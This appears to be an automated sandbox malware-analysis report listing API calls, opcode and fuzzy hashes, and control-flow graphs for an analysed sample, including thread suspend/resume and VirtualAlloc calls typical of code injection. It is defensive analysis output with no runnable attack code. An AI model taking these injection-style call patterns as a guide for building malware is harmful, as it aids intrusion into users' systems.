                                                                  • Opcode ID: 1421da440f7a70888a145fe71cc4fc97fe9f2485d57d73aa03389aa37c8065f0
                                                                  • Instruction ID: 7994502dce74c84f505234167fcdd911e828620d1eaa5e4acc3ee3411f36dd4d
                                                                  • Opcode Fuzzy Hash: 1421da440f7a70888a145fe71cc4fc97fe9f2485d57d73aa03389aa37c8065f0
                                                                  • Instruction Fuzzy Hash: 4501F963904311659A30AB358C85DABA7ACDE92770F40441BF554D7182EB70ED40E3B1
                                                                  APIs
                                                                    • Part of subcall function 00CBE2E8: _swprintf.LIBCMT ref: 00CBE30E
                                                                    • Part of subcall function 00CBE2E8: _strlen.LIBCMT ref: 00CBE32F
                                                                    • Part of subcall function 00CBE2E8: SetDlgItemTextW.USER32(?,00CEE274,?), ref: 00CBE38F
                                                                    • Part of subcall function 00CBE2E8: GetWindowRect.USER32(?,?), ref: 00CBE3C9
                                                                    • Part of subcall function 00CBE2E8: GetClientRect.USER32(?,?), ref: 00CBE3D5
                                                                  • GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
                                                                  • SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                  • String ID: 0
                                                                  • API String ID: 2622349952-4108050209
                                                                  • Opcode ID: 56cfb9f22195272cd03c0b19f049d5329cc1c71ae0e0238996829e1006409c93
                                                                  • Instruction ID: 8bacf54ce6d4d8992f7a378fa2cb0c9b3b2d7d19b344476585644f6910f7990f
                                                                  • Opcode Fuzzy Hash: 56cfb9f22195272cd03c0b19f049d5329cc1c71ae0e0238996829e1006409c93
                                                                  • Instruction Fuzzy Hash: 30F08C7010438CBADF150F608C1DAEA3BA8AF02346F488114FD58916A1EB75CA91AB20
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00CC1101,?,?,00CC117F,?,?,?,?,?,00CC1169), ref: 00CC0FEA
                                                                  • GetLastError.KERNEL32(?,?,00CC117F,?,?,?,?,?,00CC1169), ref: 00CC0FF6
                                                                    • Part of subcall function 00CB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB6C54
                                                                  Strings
                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CC0FFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                  • API String ID: 1091760877-2248577382
                                                                  • Opcode ID: ec03ac46aee59f05e054aaa7e0a8bb8b008db9b608e31a1e5bc415b92a58c487
                                                                  • Instruction ID: 53132c95fbdf932a10349e7ad62d709e74eb56b147e57b54630705ee0bf3aad1
                                                                  • Opcode Fuzzy Hash: ec03ac46aee59f05e054aaa7e0a8bb8b008db9b608e31a1e5bc415b92a58c487
                                                                  • Instruction Fuzzy Hash: B1D05B715045A476CA103325DC49FBF3D059B12731F640714F539662F6CE294A815696
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00CBDA55,?), ref: 00CBE2A3
                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CBDA55,?), ref: 00CBE2B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FindHandleModuleResource
                                                                  • String ID: RTL
                                                                  • API String ID: 3537982541-834975271
                                                                  • Opcode ID: f89ca45a78773c8c4cd603b135e332060438eb5907a01988f33bcb710385ec58
                                                                  • Instruction ID: 216ebbe8a6b070411d217799f4068c21958ded6782a4091406d534b3fa22634c
                                                                  • Opcode Fuzzy Hash: f89ca45a78773c8c4cd603b135e332060438eb5907a01988f33bcb710385ec58
                                                                  • Instruction Fuzzy Hash: B5C012312407D066E63067B56C4DB876A585B00B11F05045CB541EF1D1DAA9E58096A0

                                                                  Execution Graph

                                                                  Execution Coverage:5.5%
                                                                  Dynamic/Decrypted Code Coverage:81.2%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:16
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 23425 7ffaac73ec6d 23426 7ffaac73ec7b SuspendThread 23425->23426 23428 7ffaac73ed54 23426->23428 23421 7ffaac742255 23422 7ffaac74226f GetFileAttributesW 23421->23422 23424 7ffaac742335 23422->23424 23433 7ffaac580758 23434 7ffaac593a60 23433->23434 23435 7ffaac593d5d VirtualAlloc 23434->23435 23436 7ffaac593db5 23435->23436 23429 7ffaac740619 23430 7ffaac740627 CloseHandle 23429->23430 23432 7ffaac740704 23430->23432 23437 7ffaac7404b8 23438 7ffaac7404f3 ResumeThread 23437->23438 23440 7ffaac7405c4 23438->23440

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 42 7ffaacc98b32-7ffaacc98b38 43 7ffaacc98b39 42->43 44 7ffaacc98d55-7ffaacc98d66 43->44 45 7ffaacc98b3f-7ffaacc98b71 call 7ffaacc988d0 call 7ffaacc987a0 43->45 48 7ffaacc98d68 44->48 49 7ffaacc98d6d-7ffaacc98d78 44->49 45->44 53 7ffaacc98b77-7ffaacc98b9d call 7ffaacc988d0 45->53 48->49 53->43 57 7ffaacc98b9f-7ffaacc98bc9 call 7ffaacc987a0 53->57 57->44 61 7ffaacc98bcf-7ffaacc98c14 call 7ffaacc988d0 57->61 67 7ffaacc98c84-7ffaacc98cc0 call 7ffaacc94100 61->67 68 7ffaacc98c16-7ffaacc98c2a call 7ffaacc987a0 61->68 78 7ffaacc98cf9-7ffaacc98d00 call 7ffaacc931d0 67->78 68->44 74 7ffaacc98c30-7ffaacc98c53 call 7ffaacc988d0 68->74 79 7ffaacc98e25-7ffaacc98e3c 74->79 80 7ffaacc98c59-7ffaacc98c69 74->80 84 7ffaacc98d05-7ffaacc98d0a 78->84 85 7ffaacc98e3f-7ffaacc98e4d 79->85 86 7ffaacc98e3e 79->86 80->79 81 7ffaacc98c6f-7ffaacc98c82 80->81 81->67 81->68 87 7ffaacc98cc2-7ffaacc98ce2 84->87 88 7ffaacc98d0c-7ffaacc98d0e 84->88 90 7ffaacc98e55 85->90 91 7ffaacc98e4f 85->91 86->85 87->79 89 7ffaacc98ce8-7ffaacc98cf3 87->89 88->44 92 7ffaacc98d10-7ffaacc98d13 88->92 89->78 93 7ffaacc98ddb-7ffaacc98def 89->93 94 7ffaacc98e57 90->94 95 7ffaacc98e59-7ffaacc98e98 90->95 91->90 96 7ffaacc98d15 92->96 97 7ffaacc98d19-7ffaacc98d34 92->97 103 7ffaacc98df6-7ffaacc98e01 93->103 104 7ffaacc98df1 93->104 94->95 98 7ffaacc98e99 94->98 95->98 99 7ffaacc98e9a-7ffaacc990da 95->99 96->97 97->79 100 7ffaacc98d3a-7ffaacc98d53 call 7ffaacc987a0 97->100 98->99 100->44 107 7ffaacc98d79-7ffaacc98d92 call 7ffaacc988d0 100->107 104->103 107->79 111 7ffaacc98d98-7ffaacc98d9f 107->111 112 7ffaacc98dc9-7ffaacc98dd1 111->112 113 7ffaacc98dd3-7ffaacc98dd9 112->113 114 7ffaacc98da1-7ffaacc98dbd 112->114 113->93 115 7ffaacc98e02 113->115 114->79 116 7ffaacc98dbf-7ffaacc98dc7 114->116 115->79 116->112
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6$r6$r6
                                                                  • API String ID: 0-701349563
                                                                  • Opcode ID: 7dacf0207327399b30880ef859df755a7a5109386c63b8220d5a075a154aceda
                                                                  • Instruction ID: 877c6beee884ea31e3d3d5af641d09ca5e0d93ed9cf6d7b7d365b3dc17cf8c5c
                                                                  • Opcode Fuzzy Hash: 7dacf0207327399b30880ef859df755a7a5109386c63b8220d5a075a154aceda
                                                                  • Instruction Fuzzy Hash: 2DC1CF70A19A469FE749DF28C4906A4B7E1FF5A300F4481B9C04ECBA96DB2DF955CBC0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 117 7ffaacc9e2d2-7ffaacc9e2d9 118 7ffaacc9e4f5-7ffaacc9e506 117->118 119 7ffaacc9e2df-7ffaacc9e311 call 7ffaacc9e070 call 7ffaacc9df40 117->119 122 7ffaacc9e508 118->122 123 7ffaacc9e50d-7ffaacc9e518 118->123 119->118 127 7ffaacc9e317-7ffaacc9e369 call 7ffaacc9e070 call 7ffaacc9df40 119->127 122->123 127->118 134 7ffaacc9e36f-7ffaacc9e3b4 call 7ffaacc9e070 127->134 140 7ffaacc9e424-7ffaacc9e460 call 7ffaacc969e0 134->140 141 7ffaacc9e3b6-7ffaacc9e3ca call 7ffaacc9df40 134->141 151 7ffaacc9e499-7ffaacc9e4a0 call 7ffaacc9adc8 140->151 141->118 147 7ffaacc9e3d0-7ffaacc9e3f3 call 7ffaacc9e070 141->147 152 7ffaacc9e5c5-7ffaacc9e5dc 147->152 153 7ffaacc9e3f9-7ffaacc9e409 147->153 157 7ffaacc9e4a5-7ffaacc9e4aa 151->157 158 7ffaacc9e5df-7ffaacc9e5ed 152->158 159 7ffaacc9e5de 152->159 153->152 154 7ffaacc9e40f-7ffaacc9e422 153->154 154->140 154->141 160 7ffaacc9e462-7ffaacc9e482 157->160 161 7ffaacc9e4ac-7ffaacc9e4ae 157->161 163 7ffaacc9e5f5 158->163 164 7ffaacc9e5ef 158->164 159->158 160->152 162 7ffaacc9e488-7ffaacc9e493 160->162 161->118 165 7ffaacc9e4b0-7ffaacc9e4b3 161->165 162->151 166 7ffaacc9e57b-7ffaacc9e58f 162->166 167 7ffaacc9e5f7 163->167 168 7ffaacc9e5f9-7ffaacc9e638 163->168 164->163 169 7ffaacc9e4b5 165->169 170 7ffaacc9e4b9-7ffaacc9e4d4 165->170 177 7ffaacc9e596-7ffaacc9e5a1 166->177 178 7ffaacc9e591 166->178 167->168 174 7ffaacc9e639 167->174 168->174 175 7ffaacc9e63a-7ffaacc9e87a 168->175 169->170 170->152 172 7ffaacc9e4da-7ffaacc9e4f3 call 7ffaacc9df40 170->172 172->118 180 7ffaacc9e519-7ffaacc9e532 call 7ffaacc9e070 172->180 174->175 178->177 180->152 185 7ffaacc9e538-7ffaacc9e53f 180->185 186 7ffaacc9e569-7ffaacc9e571 185->186 187 7ffaacc9e573-7ffaacc9e579 186->187 188 7ffaacc9e541-7ffaacc9e55d 186->188 187->166 189 7ffaacc9e5a2 187->189 188->152 190 7ffaacc9e55f-7ffaacc9e567 188->190 189->152 190->186
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6$r6$r6
                                                                  • API String ID: 0-701349563
                                                                  • Opcode ID: b02c19cbbec8592a3f010c2a65da1bdb1cf6bfe3a4337e63b799aa665b12083d
                                                                  • Instruction ID: 540f763d48fd83530b84200af97e08f42e7cedbdb7ace196a66c62cf94e23e05
                                                                  • Opcode Fuzzy Hash: b02c19cbbec8592a3f010c2a65da1bdb1cf6bfe3a4337e63b799aa665b12083d
                                                                  • Instruction Fuzzy Hash: E4C1C170A09A46CFE759DF68C0916A4B7A1FF6A300F4481BDD05EC7A86DB2DF8558BC0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 191 7ffaacc9ea1f-7ffaacc9ea32 192 7ffaacc9ea34-7ffaacc9ea38 191->192 193 7ffaacc9ea7e-7ffaacc9ea94 191->193 194 7ffaacc9ed75 192->194 195 7ffaacc9eb24-7ffaacc9eb30 193->195 196 7ffaacc9ea9a-7ffaacc9eaa2 193->196 198 7ffaacc9ed7f-7ffaacc9edbe 194->198 195->194 197 7ffaacc9eaa8-7ffaacc9eaba 196->197 196->198 197->198 200 7ffaacc9eac0-7ffaacc9ead7 197->200 204 7ffaacc9edc0 198->204 202 7ffaacc9eb17-7ffaacc9eb1e 200->202 203 7ffaacc9ead9-7ffaacc9eae0 200->203 202->195 202->196 203->198 205 7ffaacc9eae6-7ffaacc9eb14 203->205 206 7ffaacc9edcb-7ffaacc9ee61 204->206 205->202 209 7ffaacc9ede6-7ffaacc9ee66 206->209 210 7ffaacc9ee6c-7ffaacc9f335 206->210 209->210 214 7ffaacc9ee08-7ffaacc9ee68 209->214 214->210 219 7ffaacc9ee2c-7ffaacc9ee6a 214->219 219->210 225 7ffaacc9ee4d-7ffaacc9ee60 219->225
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: T^H$b4
                                                                  • API String ID: 0-1226007302
                                                                  • Opcode ID: c20d184559b434ee35b43063c19b1dbea91abe75dfa158ba94455d9f57636749
                                                                  • Instruction ID: e9621afa0ee4c186b53cc0d19326f2ea48cbdcb2e48a6b1053e12cb16ac8ea07
                                                                  • Opcode Fuzzy Hash: c20d184559b434ee35b43063c19b1dbea91abe75dfa158ba94455d9f57636749
                                                                  • Instruction Fuzzy Hash: 4781F430919556CFEB69CF18C4916B57BA1FF66300F0485BDC45E8B69BCA3CE845CB81

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $r6
                                                                  • API String ID: 0-2810495310
                                                                  • Opcode ID: cd86a01637a7b75e58248366a79c667b6edd2ed5310cf0ee4d16b25a280073a7
                                                                  • Instruction ID: ead7d3467bf9e117693a32203dc373275e2967b44be8184b951b1f0d337001b8
                                                                  • Opcode Fuzzy Hash: cd86a01637a7b75e58248366a79c667b6edd2ed5310cf0ee4d16b25a280073a7
                                                                  • Instruction Fuzzy Hash: 6B516C70D0965ACFEBA9DF98C4555BDB7B1EF55300F10807EC01EE7292CA3AA905CB91

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $r6
                                                                  • API String ID: 0-2810495310
                                                                  • Opcode ID: 60132593e7b831224097427fda194180b662be28016c0edde7156da530bd6828
                                                                  • Instruction ID: c752e96792c4c279bfb4c43bfed779a1f0d69edfe77edee7e7d7e2373d3ce3c6
                                                                  • Opcode Fuzzy Hash: 60132593e7b831224097427fda194180b662be28016c0edde7156da530bd6828
                                                                  • Instruction Fuzzy Hash: 83512C71D0964ACFEB58DF98C4555BDB7B1FF49300F1081BAD01EE7292CA3AA909CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 300 7ffaacc97b35-7ffaacc97b57 303 7ffaacc97bc8-7ffaacc97bd1 call 7ffaacc97d48 300->303 304 7ffaacc97b59-7ffaacc97b5b 300->304 314 7ffaacc97bd3 303->314 315 7ffaacc97bd4-7ffaacc97bd6 303->315 305 7ffaacc97bd7-7ffaacc97c00 304->305 306 7ffaacc97b5d 304->306 320 7ffaacc97c01-7ffaacc97c03 305->320 308 7ffaacc97b5f-7ffaacc97b60 306->308 309 7ffaacc97b61 306->309 308->309 312 7ffaacc97b63-7ffaacc97b85 309->312 313 7ffaacc97b99-7ffaacc97bc4 call 7ffaacc919c0 309->313 312->320 325 7ffaacc97b87 312->325 313->303 314->315 315->305 326 7ffaacc97b89 325->326 327 7ffaacc97b8a-7ffaacc97b91 call 7ffaacc92d18 325->327 326->327 329 7ffaacc97b96-7ffaacc97b97 327->329 329->313
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6$r6
                                                                  • API String ID: 0-2018302956
                                                                  • Opcode ID: 8b35e6e1d92a48c18f5e5e5b388c67b26767665e28777fb73e54122ed608f2ef
                                                                  • Instruction ID: b7eb5fd8cc33caaa50ffba6eb1e532667b72f593940efa570c697e6136685a5d
                                                                  • Opcode Fuzzy Hash: 8b35e6e1d92a48c18f5e5e5b388c67b26767665e28777fb73e54122ed608f2ef
                                                                  • Instruction Fuzzy Hash: DE31F77191EA59CFFB98DF6848126A8B7D1EF57310F4441BAD04EC36C2DD1DA80987C1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 338 7ffaac7404b8-7ffaac7404f1 339 7ffaac7404f4-7ffaac7405c2 ResumeThread 338->339 340 7ffaac7404f3 338->340 344 7ffaac7405ca-7ffaac740614 339->344 345 7ffaac7405c4 339->345 340->339 345->344
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 9c031a094ec2b4280035933ca6dd3fa783756e5670e31cb11b4948c3157a7d84
                                                                  • Instruction ID: 9f8d0c148d6cb8d0bab1ede740202dd1a242ced8a3fcca4545bf0085a093f78f
                                                                  • Opcode Fuzzy Hash: 9c031a094ec2b4280035933ca6dd3fa783756e5670e31cb11b4948c3157a7d84
                                                                  • Instruction Fuzzy Hash: B6519A7090C78C8FDB55DFA8D854AE9BFF0EF56310F0441ABD049EB292DA349886CB51

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1612900652.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaac580000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 7ce74bb92ef507e5ece2d44df9886c071a4ec33bf82d3ad3bc2c58d1c4cac711
                                                                  • Instruction ID: a5031e8f76249c5eab93c30cd04c348b1579c6a4e30cdcd6e2ed352ff137867e
                                                                  • Opcode Fuzzy Hash: 7ce74bb92ef507e5ece2d44df9886c071a4ec33bf82d3ad3bc2c58d1c4cac711
                                                                  • Instruction Fuzzy Hash: B6D19F70958A4D8FEB94EF68C845AED7BF1FF59301F0041AAE40DD3252CB39A985CB81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 391 7ffaac580755-7ffaac580757
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1612900652.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaac580000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 1e7612bab508395b138a526065f10f94c2f30147476052d4d2f375b954289b68
                                                                  • Instruction ID: 8c7446534dec84b0c24cafb74dbb309c1f684672d87abd01d5ecd59ecbb3ef77
                                                                  • Opcode Fuzzy Hash: 1e7612bab508395b138a526065f10f94c2f30147476052d4d2f375b954289b68
                                                                  • Instruction Fuzzy Hash: 2AD18E70958A4D8FEB94EF68C845AEDBBF1FF59301F0041AAE40DD3252CB35A985CB81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 393 7ffaac73ec6d-7ffaac73ec79 394 7ffaac73ec7b-7ffaac73ec83 393->394 395 7ffaac73ec84-7ffaac73ed52 SuspendThread 393->395 394->395 398 7ffaac73ed5a-7ffaac73eda4 395->398 399 7ffaac73ed54 395->399 399->398
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID: SuspendThread
                                                                  • String ID:
                                                                  • API String ID: 3178671153-0
                                                                  • Opcode ID: 9cfd45300b17bbfed69fd1a95bbb33e5a9c715c99fb5517d5e7d40507fac52ef
                                                                  • Instruction ID: b9cd244febdd8dc83d1223ced436abe49ee7c1b3e2960ba35938b8bb560c3505
                                                                  • Opcode Fuzzy Hash: 9cfd45300b17bbfed69fd1a95bbb33e5a9c715c99fb5517d5e7d40507fac52ef
                                                                  • Instruction Fuzzy Hash: E541497090864C8FDB59DFA8D889BEDBBF0FB5A310F10416AD049E7292DB70A885CF41

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 402 7ffaac742255-7ffaac742333 GetFileAttributesW 406 7ffaac74233b-7ffaac742379 402->406 407 7ffaac742335 402->407 407->406
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 68826c39f5d1d14706d52e4334ff4f62667f3d440ce4647e1f7bd26af8ab8658
                                                                  • Instruction ID: 7d17fa100b5dc42f9a5fcca2808721908452ada9482c199e125396e535afaf5f
                                                                  • Opcode Fuzzy Hash: 68826c39f5d1d14706d52e4334ff4f62667f3d440ce4647e1f7bd26af8ab8658
                                                                  • Instruction Fuzzy Hash: 6741F874E0860C8FDB98DF98D885BEDBBF1FB5A311F10416AD44DE7252DA71A885CB40

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: P~
                                                                  • API String ID: 0-2466740200
                                                                  • Opcode ID: 851edd3cd284ca2e23f56ffa96fd86590edc3c9bd1b7d83417957aa047537c76
                                                                  • Instruction ID: 78363848ead0e1ebec9571f4dc5509ceafe7ca495b0dd69478b1d7ea1b42b59b
                                                                  • Opcode Fuzzy Hash: 851edd3cd284ca2e23f56ffa96fd86590edc3c9bd1b7d83417957aa047537c76
                                                                  • Instruction Fuzzy Hash: AFA1B57191EA4ACFE795DF28C8556B87BE1FF56300F4481B6D04EC72A2DE29DC098781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /
                                                                  • API String ID: 0-1686368129
                                                                  • Opcode ID: 520c13cf9a22957d46c55d1f3235e9446e6bac64d307c5c4a16b1ac08a07e3f1
                                                                  • Instruction ID: 0f82d236447667f0251cb111a38b8cb89f465f16337786fcff4184009b935ff8
                                                                  • Opcode Fuzzy Hash: 520c13cf9a22957d46c55d1f3235e9446e6bac64d307c5c4a16b1ac08a07e3f1
                                                                  • Instruction Fuzzy Hash: 40819B70D1EA4ECEFB94DB6488516BC7BA0FF56300F5046BAD00ED7191DE2EA8498781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /
                                                                  • API String ID: 0-1686368129
                                                                  • Opcode ID: ef280797ffd6f402e0dbe81e7192c5f9f97330e881914983384bf7f8c30c0a5c
                                                                  • Instruction ID: c64ee8c72f4f2f3c14aa384548461d7366d98c04699c31b9623b145f26b24363
                                                                  • Opcode Fuzzy Hash: ef280797ffd6f402e0dbe81e7192c5f9f97330e881914983384bf7f8c30c0a5c
                                                                  • Instruction Fuzzy Hash: FE81BF70D1E64ACEFB54DF64C8546BCBBA1FF5A340F5084BAD00ED7192DE2EA8499780
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x^
                                                                  • API String ID: 0-3107577783
                                                                  • Opcode ID: ef08afd203e7993aacec1203e5cf0c85d4d004428419a7767963e3cd42d4110a
                                                                  • Instruction ID: 033c3d7fb887cd5963829c44413c29407c77bb206f1a50a029d3aec69b937926
                                                                  • Opcode Fuzzy Hash: ef08afd203e7993aacec1203e5cf0c85d4d004428419a7767963e3cd42d4110a
